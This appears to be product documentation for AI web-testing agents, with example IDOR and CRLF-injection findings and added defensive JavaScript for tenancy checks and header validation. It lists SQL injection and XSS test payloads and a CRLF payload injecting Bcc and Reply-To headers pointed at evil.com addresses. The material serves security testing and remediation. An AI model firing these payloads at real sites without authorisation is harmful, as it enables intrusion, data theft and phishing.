Web Testing Agents

AI agents specialized for testing web applications

Our web testing agents specialize in finding vulnerabilities in websites and web applications. Each agent focuses on specific vulnerability categories from the OWASP Top 10.

Agent Overview

| Agent | Focus Area | OWASP Specialization |
| --- | --- | --- |
| Recon Agent | Discovery & mapping | Foundation for all testing |
| Access Control Agent | Authorization testing | A01 - Broken Access Control |
| Injection Agent | Input validation | A03 - Injection |

Recon Agent

The Reconnaissance Agent is the foundation of every pentest. It maps your application to enable effective testing.

What It Does

  • Endpoint Discovery - Finds all accessible pages and routes
  • Technology Detection - Identifies frameworks, libraries, versions
  • Authentication Mapping - Understands login flows and session handling
  • Input Identification - Locates forms, parameters, and entry points
  • Architecture Understanding - Recognizes admin areas, user sections, APIs

How It Works

The Recon Agent takes your application URL and produces a comprehensive Application Map:

  • Endpoints — All discovered pages and routes (typically 20-100+)
  • Technologies — Frameworks, libraries, and versions detected
  • Authentication flows — Login mechanisms and session handling
  • Forms and parameters — All user input points
  • Testing plan — Prioritized targets for other agents

Output

The Recon Agent produces a comprehensive map used by all other agents:

  • List of endpoints to test
  • Technology-specific considerations
  • Authentication tokens and flows
  • Priority targets based on risk

Access Control Agent

Tests for authorization vulnerabilities—the #1 most common web application security risk.

What It Tests

OWASP A01 - Broken Access Control (34% of applications)

| Vulnerability | Description |
| --- | --- |
| IDOR | Accessing other users' data via predictable references |
| Horizontal Privilege Escalation | User A accessing User B's resources |
| Vertical Privilege Escalation | Regular user accessing admin functions |
| Forced Browsing | Accessing unauthorized pages directly |
| Missing Authorization | Endpoints without access checks |

Testing Methodology

  1. Identify Object References - Find IDs, UUIDs, and other references
  2. Baseline Collection - Document legitimate access patterns
  3. Cross-User Testing - Attempt access with different credentials
  4. Privilege Testing - Try escalating to higher permission levels
  5. Authorization Bypass - Test various bypass techniques

Example Finding

❌ Critical: Unauthorized Cross-Organization Domain Deletion (IDOR)

Endpoint: DELETE /api/domains/:id
Parameter: id
CWE: CWE-639 (Authorization Bypass Through User-Controlled Key)
OWASP: A01:2021-Broken Access Control

Issue: The DELETE endpoint does not verify the authenticated user
       owns the domain or belongs to the same organization.

Evidence - Authorization Comparison:
-  GET /api/domains/:id  → 403 Forbidden (Protected ✓)
-  DELETE /api/domains/:id → 200 OK (VULNERABLE ✗)

Exploitation Proof:
- Attacker: bob@acme.com (Org: ACME Corp)
- Victim: admin@techstart.com (Org: TechStart Inc)
- Result: Attacker successfully deleted victim's domain
- Verification: GET by victim returned {"error":"Domain not found"}

Impact:
- Multi-tenant isolation breach
- Cross-organization data deletion
- Service disruption for victims
- Compliance violations (GDPR/CCPA)
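
The fix for a finding of this kind is to route every HTTP method on the resource through one tenancy check, so that GET and DELETE cannot drift apart. The following is an added example, not ModernPentest's or the tested application's code; the in-memory store, function names, and sample records are hypothetical and constructed for illustration.

```javascript
// Added example: in-memory store and all names are hypothetical, data is constructed.
function seedStore() {
  return new Map([
    ["d-100", { id: "d-100", orgId: "org-acme", name: "acme.example" }],
    ["d-200", { id: "d-200", orgId: "org-techstart", name: "techstart.example" }],
  ]);
}

// Shape of the reported flaw: the delete path never compares the caller's org.
function deleteDomainVulnerable(user, id, store) {
  if (!store.has(id)) return { status: 404 };
  store.delete(id);
  return { status: 200 };
}

// Hardened shape: one loader enforces tenancy, and every method goes through it.
function loadOwnedDomain(user, id, store) {
  const domain = store.get(id);
  if (!domain) return { status: 404 };
  if (domain.orgId !== user.orgId) return { status: 403 };
  return { status: 200, domain };
}

function handleDomain(method, user, id, store) {
  const loaded = loadOwnedDomain(user, id, store);
  if (loaded.status !== 200) return { status: loaded.status };
  switch (method) {
    case "GET":
      return { status: 200, body: loaded.domain };
    case "DELETE":
      store.delete(id);
      return { status: 200 };
    default:
      return { status: 405 };
  }
}

// Regression check: a cross-tenant caller gets the same denial on every method,
// and the record survives. Returns { statuses, stillExists }.
function crossTenantCheck(user, id) {
  const store = seedStore();
  const statuses = {};
  for (const method of ["GET", "DELETE"]) {
    statuses[method] = handleDomain(method, user, id, store).status;
  }
  return { statuses, stillExists: store.has(id) };
}
```

Running `crossTenantCheck` as a regression test for each resource type catches the case where a new method is added without the shared loader.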

Injection Agent

Tests for injection vulnerabilities—malicious data sent to interpreters.

What It Tests

OWASP A03 - Injection (18% of applications)

| Vulnerability | Description |
| --- | --- |
| SQL Injection | Database query manipulation |
| Cross-Site Scripting (XSS) | Script injection into web pages |
| Command Injection | OS command execution |
| Server-Side Template Injection | Template engine exploitation |
| NoSQL Injection | Document database manipulation |
| XML External Entity (XXE) | XML parser exploitation |

Testing Methodology

For each input parameter discovered by Recon:

  1. Identify injection points - Forms, URL params, headers, JSON
  2. Determine context - SQL, HTML, OS command, template
  3. Send test payloads - Technology-appropriate inputs
  4. Analyze responses - Errors, behavior changes, timing
  5. Validate findings - Confirm exploitability

SQL Injection Testing

Input: search?q=test

Test payloads:
- test'           → SQL error indicates vulnerability
- test' OR '1'='1 → Behavior change indicates vulnerability
- test'; WAITFOR DELAY '0:0:5'-- → Time delay indicates blind SQLi

XSS Testing

Input: comment field

Test payloads (context-aware):
- HTML: <script>alert(1)</script>
- Attribute: " onclick="alert(1)"
- JavaScript: ';alert(1)//

Example Finding

❌ High: CRLF Injection Enables Email Header Manipulation

Endpoint: POST /api/emails
Parameter: subject
CWE: CWE-93 (CRLF Injection)
OWASP: A03:2021-Injection

Issue: The email subject field accepts CRLF characters (\r\n),
       allowing injection of arbitrary email headers.

Payload:
  subject: "Confidential\r\nBcc: attacker@evil.com\r\nReply-To: phishing@evil.com"

Injected Headers Confirmed:
- Bcc: attacker@evil.com (blind copy to attacker)
- Reply-To: phishing@evil.com (redirects replies)
- X-Priority: 1 (marks as urgent)
- Content-Type: text/html; charset=UTF-7

Response:
  {"id":"438356f2-...", "subject":"Confidential\r\nBcc: attacker@evil.com...", "status":"sent"}

Persistence: CRLF characters stored in database and returned in GET responses

Impact:
- Leak confidential emails via Bcc injection
- Phishing attacks via Reply-To manipulation
- Bypass email security filters
- Affects all users sending through the platform
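
Because the finding notes that the CRLF characters were also stored and returned by GET, the value has to be rejected at the API boundary, before it is persisted or placed in a message. The following is an added example, not ModernPentest's or the tested application's code; the helper names are hypothetical, and it contrasts plain concatenation with a header builder that refuses control characters.

```javascript
// Added example; function names are hypothetical, inputs are constructed.
const CRLF = "\r\n";
const HEADER_NAME = /^[!-9;-~]+$/;        // RFC 5322 field name: printable ASCII except ":"
const CONTROL_CHARS = /[\x00-\x1f\x7f]/;  // covers \r, \n, NUL and other C0 controls

// Vulnerable shape: values are concatenated straight into the header block.
function buildHeadersNaive(fields) {
  return Object.entries(fields).map(([k, v]) => `${k}: ${v}`).join(CRLF);
}

// Hardened shape: validate before the value is stored or sent.
function validateHeader(name, value) {
  if (!HEADER_NAME.test(name)) throw new Error(`invalid header name: ${JSON.stringify(name)}`);
  if (typeof value !== "string") throw new Error(`${name}: value must be a string`);
  if (CONTROL_CHARS.test(value)) throw new Error(`${name}: control character in value`);
  // RFC 5322 caps a header line at 998 characters excluding the CRLF.
  if (name.length + 2 + value.length > 998) throw new Error(`${name}: line too long`);
  return value;
}

function buildHeadersSafe(fields) {
  return Object.entries(fields)
    .map(([k, v]) => `${k}: ${validateHeader(k, v)}`)
    .join(CRLF);
}

// What a mail parser sees: one header per CRLF-separated line.
function headerNames(block) {
  return block.split(CRLF).map((line) => line.slice(0, line.indexOf(":")));
}

// Wrapper that reports the rejection instead of throwing.
function tryBuild(fields) {
  try {
    return { ok: true, headers: buildHeadersSafe(fields) };
  } catch (err) {
    return { ok: false, error: err.message };
  }
}

// The subject value from the finding above.
const reportedSubject =
  "Confidential\r\nBcc: attacker@evil.com\r\nReply-To: phishing@evil.com";
```

Rejecting the request is preferable to silently stripping the characters, since stripping still stores attacker-shaped text and hides the attempt from logs.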

Parallel Execution

After Recon completes, specialized agents run simultaneously on different endpoint groups:

| Agent | Target Endpoints | Focus |
| --- | --- | --- |
| Access Control Agent | /users/*, /orders/*, /admin/* | Authorization bypass, IDOR |
| Injection Agent | /search, /api/*, forms | SQL injection, XSS, command injection |

All findings then flow into the Consolidation phase for deduplication and validation.

Findings Consolidation

After all agents complete:

  1. Deduplication - Same vulnerability found by multiple agents? Merged.
  2. Validation - Each finding confirmed for accuracy
  3. Severity Assessment - Real-world risk evaluated
  4. Remediation - Fix guidance tailored to your stack

Last updated: December 8, 2025
